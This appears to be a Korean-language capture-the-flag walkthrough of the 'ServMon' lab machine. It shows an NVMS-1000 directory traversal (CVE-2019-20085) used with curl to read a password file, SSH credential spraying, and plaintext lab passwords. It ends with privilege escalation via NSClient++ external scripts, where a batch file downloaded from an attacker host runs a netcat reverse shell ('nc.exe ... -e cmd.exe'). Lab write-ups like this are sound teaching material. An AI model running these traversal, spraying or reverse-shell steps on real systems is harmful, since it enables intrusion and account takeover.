ServMon

Proof of Concept

10.129.5.72

Nmap

PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
5666/tcp open  nrpe
6699/tcp open  napster
8443/tcp open  https-alt

---

Information Gathering

hosts 정보 수집

┌──(kali㉿kali)-[~/ServMon]
└─$ nxc smb 10.129.5.72 --generate-hosts-file host
SMB         10.129.5.72      445    SERVMON          [*] Windows 10 / Server 2019 Build 17763 x64 (name:SERVMON) (domain:ServMon) (signing:False) (SMBv1:False)
 
┌──(kali㉿kali)-[~/ServMon]
└─$ cat host
10.129.5.72     SERVMON.ServMon SERVMON

/etc/hosts 파일 설정

┌──(kali㉿kali)-[~/ServMon]
└─$ cat /etc/hosts
127.0.0.1	localhost
127.0.1.1	kali
::1		localhost ip6-localhost ip6-loopback
ff02::1		ip6-allnodes
ff02::2		ip6-allrouters
 
10.129.5.72     SERVMON.ServMon SERVMON

---

Initial Access

FTP에 Anonymous 로그인 성공

┌──(kali㉿kali)-[~/ServMon]
└─$ ftp 10.129.5.72
Connected to 10.129.5.72.
220 Microsoft FTP Service
Name (10.129.5.72:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp>

Users\Nadine 디렉토리에서 “Confidential.txt” 파일 발견

ftp> ls
229 Entering Extended Passive Mode (|||49677|)
125 Data connection already open; Transfer starting.
02-28-22  06:35PM       <DIR>          Users
226 Transfer complete.
ftp> cd Users
250 CWD command successful.
ftp> dir
229 Entering Extended Passive Mode (|||49678|)
125 Data connection already open; Transfer starting.
02-28-22  06:36PM       <DIR>          Nadine
02-28-22  06:37PM       <DIR>          Nathan
226 Transfer complete.
ftp> dir
229 Entering Extended Passive Mode (|||49686|)
c125 Data connection already open; Transfer starting.
02-28-22  06:36PM       <DIR>          Nadine
02-28-22  06:37PM       <DIR>          Nathan
226 Transfer complete.
ftp> cd Nadine
250 CWD command successful.
ftp> dir
229 Entering Extended Passive Mode (|||49687|)
125 Data connection already open; Transfer starting.
02-28-22  06:36PM                  168 Confidential.txt
226 Transfer complete.
ftp> get Confidential.txt
local: Confidential.txt remote: Confidential.txt
229 Entering Extended Passive Mode (|||49691|)
125 Data connection already open; Transfer starting.
100% |*********************************************************************************************************************************************************************|   168        0.56 KiB/s    00:00 ETA
226 Transfer complete.
WARNING! 6 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
168 bytes received in 00:00 (0.56 KiB/s)

“Confidential.txt” 파일 확인 결과 “Nathan” 사용자 Desktop 디렉토리에 비밀번호가 작성된 “Passwords.txt” 파일이 존재하는 것을 확인

┌──(kali㉿kali)-[~/ServMon]
└─$ cat Confidential.txt
Nathan,
 
I left your Passwords.txt file on your Desktop.  Please remove this once you have edited it yourself and place it back into the secure folder.
 
Regards
 
Nadine 

Users\Nathan 디렉토리에서 “Notes to do.txt” 파일 발견

ftp> cd Nathan
250 CWD command successful.
ftp> dir
229 Entering Extended Passive Mode (|||49680|)
125 Data connection already open; Transfer starting.
02-28-22  06:36PM                  182 Notes to do.txt
226 Transfer complete.
ftp> get "Notes to do.txt"
local: Notes to do.txt remote: Notes to do.txt
229 Entering Extended Passive Mode (|||49681|)
125 Data connection already open; Transfer starting.
100% |*********************************************************************************************************************************************************************|   182        0.73 KiB/s    00:00 ETA
226 Transfer complete.
WARNING! 4 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
182 bytes received in 00:00 (0.73 KiB/s)

“Notes to do.txt” 파일 확인

┌──(kali㉿kali)-[~/ServMon]
└─$ cat Notes\ to\ do.txt
1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint 

80포트 웹서비스 접속 시 “NVMS-1000” 서비스 로그인 페이지 존재

해당 서비스에서 Directory Traversal 취약점 발견 (CVE-2019-20085)

• https://www.cve.org/CVERecord?id=CVE-2019-20085

CVE-2019-20085 취약점이 동작하는 것을 확인

┌──(kali㉿kali)-[~/ServMon/NVMS1000-Exploit]
└─$ curl --path-as-is http://10.129.5.72/../../../../../../../../../../../../windows/win.ini
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1

취약점을 이용하여 Passwords.txt 파일 확인

┌──(kali㉿kali)-[~/ServMon/NVMS1000-Exploit]
└─$ curl --path-as-is http://10.129.5.72/../../../../../../../../../../../../Users/Nathan/Desktop/Passwords.txt
1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$

Nadine:L1k3B1gBut7s@W0rk 으로 SSH 인증 성공

┌──(kali㉿kali)-[~/ServMon/NVMS1000-Exploit]
└─$ nxc ssh servmon.servmon -u 'Nadine' -p passwords.txt -t 100
SSH         10.129.5.72      22     servmon.servmon  [*] SSH-2.0-OpenSSH_for_Windows_8.0
SSH         10.129.5.72      22     servmon.servmon  [-] Nadine:1nsp3ctTh3Way2Mars!
SSH         10.129.5.72      22     servmon.servmon  [-] Nadine:Th3r34r3To0M4nyTrait0r5!
SSH         10.129.5.72      22     servmon.servmon  [-] Nadine:B3WithM30r4ga1n5tMe
SSH         10.129.5.72      22     servmon.servmon  [+] Nadine:L1k3B1gBut7s@W0rk  Windows - Shell access!

Nadine 사용자 크리덴셜을 사용하여 SSH 접속

┌──(kali㉿kali)-[~/ServMon/NVMS1000-Exploit]
└─$ sshpass -p 'L1k3B1gBut7s@W0rk' ssh nadine@servmon.servmon
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
Microsoft Windows [Version 10.0.17763.864]
(c) 2018 Microsoft Corporation. All rights reserved.
 
nadine@SERVMON C:\Users\Nadine>

Read usert.xt

nadine@SERVMON C:\Users\Nadine\Desktop>type user.txt
213508c109346de95c5cff783e5a0c12
 
nadine@SERVMON C:\Users\Nadine\Desktop>ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0:
 
   Connection-specific DNS Suffix  . : .htb
   IPv6 Address. . . . . . . . . . . : dead:beef::1ff
   IPv6 Address. . . . . . . . . . . : dead:beef::5481:7dff:ecdf:306
   Link-local IPv6 Address . . . . . : fe80::5481:7dff:ecdf:306%6
   IPv4 Address. . . . . . . . . . . : 10.129.5.72
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb0:8cde%6
                                       10.129.0.1

---

Privilege Escalation

WinPEAS 스캔 결과 NSClient++ 소프트웨어가 설치된 것을 발견

<SNIP>
+----------¦ Installed Applications --Via Program Files/Uninstall registry--
+ Check if you can modify installed software https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#applications
    C:\Program Files\Common Files
    C:\Program Files\desktop.ini
    C:\Program Files\internet explorer
    C:\Program Files\MSBuild
    C:\Program Files\NSClient++
    C:\Program Files\NVMS-1000
    C:\Program Files\OpenSSH-Win64
    C:\Program Files\Reference Assemblies
    C:\Program Files\Uninstall Information
    C:\Program Files\VMware
    C:\Program Files\Windows Defender
    C:\Program Files\Windows Defender Advanced Threat Protection
    C:\Program Files\Windows Mail
    C:\Program Files\Windows Media Player
    C:\Program Files\Windows Multimedia Platform
    C:\Program Files\windows nt
    C:\Program Files\Windows Photo Viewer
    C:\Program Files\Windows Portable Devices
    C:\Program Files\Windows Security
    C:\Program Files\Windows Sidebar
    C:\Program Files\WindowsApps
    C:\Program Files\WindowsPowerShell
<SNIP>

nsclient.ini 파일에서 NSClient++ 비밀번호 발견

• ew2x6SsGTxjRwXOT

PS C:\Program Files\NSClient++> Get-ChildItem -Path 'C:\Program Files\NSClient++\' -Include *.txt,*.ini -File -Recurse -ErrorAction SilentlyContinue | Select-String "passw" -List
 
changelog.txt:54: * Removed erroneous error message bout web password
nsclient.ini:12:password = ew2x6SsGTxjRwXOT

nsclient.ini을 자세히 확인해보면 추가로 로컬호스트에서만 접속 가능한 것을 확인

nadine@SERVMON C:\Program Files\NSClient++>type nsclient.ini
# If you want to fill this file with all available options run the following command:
#   nscp settings --generate --add-defaults --load-all
# If you want to activate a module and bring in all its options use:
#   nscp settings --activate-module <MODULE NAME> --add-defaults
# For details run: nscp settings --help
 
 
; in flight - TODO
[/settings/default]
 
; Undocumented key
password = ew2x6SsGTxjRwXOT
 
; Undocumented key
allowed hosts = 127.0.0.1
 
 
; in flight - TODO
[/settings/NRPE/server]
 
; Undocumented key
ssl options = no-sslv2,no-sslv3
 
; Undocumented key
verify mode = peer-cert
 
; Undocumented key
insecure = false
<SNIP>

SSH 포트포워딩 설정

┌──(kali㉿kali)-[~/ServMon]
└─$ sshpass -p 'L1k3B1gBut7s@W0rk' ssh -L 8443:127.0.0.1:8443 nadine@servmon.servmon
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
Microsoft Windows [Version 10.0.17763.864]
(c) 2018 Microsoft Corporation. All rights reserved.
 
nadine@SERVMON C:\Users\Nadine>

이후 https://127.0.0.1:8443를 통해 NSClient++ 웹페이지에 접근 가능하며, 이전에 획득한 비밀번호 “ew2x6SsGTxjRwXOT”로 로그인 가능

Downloaded nc.exe and evil.bat to c:\temp from attacking machine

nadine@SERVMON C:\Users\Nadine>cd ..
nadine@SERVMON C:\Users>cd ..
nadine@SERVMON C:\>mkdir temp
nadine@SERVMON C:\>cd temp
nadine@SERVMON C:\temp>curl.exe -O http://10.10.14.221:8000/evil.bat
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100    53  100    53    0     0     53      0  0:00:01 --:--:--  0:00:01   109
 
nadine@SERVMON C:\temp>curl.exe -O http://10.10.14.221:8000/nc.exe
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 45272  100 45272    0     0  45272      0  0:00:01  0:00:01 --:--:-- 45272
 
nadine@SERVMON C:\temp>type evil.bat
@echo off
c:\temp\nc.exe 10.10.14.221 443 -e cmd.exe

Setup reverse shell listener on attacking machine

┌──(kali㉿kali)-[~/ServMon]
└─$ rlwrap nc -nlvp 443
listening on [any] 443 ...

Settings > External Scripts > Scripts > Add new에서 evil.bat을 호출하는 foobar 스크립트 생성

• Section: /settings/external scripts/scripts/foobar
• Key: command
• Value: c:\temp\evil.bat

스크립트 생성 후 Changes > Always save로 설정 저장 및 Control > Reload로 재시작

서비스가 재시작 되었으면 Queries > shell > Run에서 스크립트 실행 시 리버스쉘이 연결됨

┌──(kali㉿kali)-[~/ServMon]
└─$ rlwrap nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.221] from (UNKNOWN) [10.129.5.72] 49969
Microsoft Windows [Version 10.0.17763.864]
(c) 2018 Microsoft Corporation. All rights reserved.
 
C:\Program Files\NSClient++>

Read root.txt

type root.txt
0450d679da4c4af55f11ec13fcf93efc
 
C:\Users\Administrator\Desktop>ipconfig
ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0:
 
   Connection-specific DNS Suffix  . : .htb
   IPv6 Address. . . . . . . . . . . : dead:beef::1b4
   IPv6 Address. . . . . . . . . . . : dead:beef::10ae:8f46:7b2d:e6c2
   Link-local IPv6 Address . . . . . : fe80::10ae:8f46:7b2d:e6c2%6
   IPv4 Address. . . . . . . . . . . : 10.129.5.72
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb0:8cde%6
                                       10.129.0.1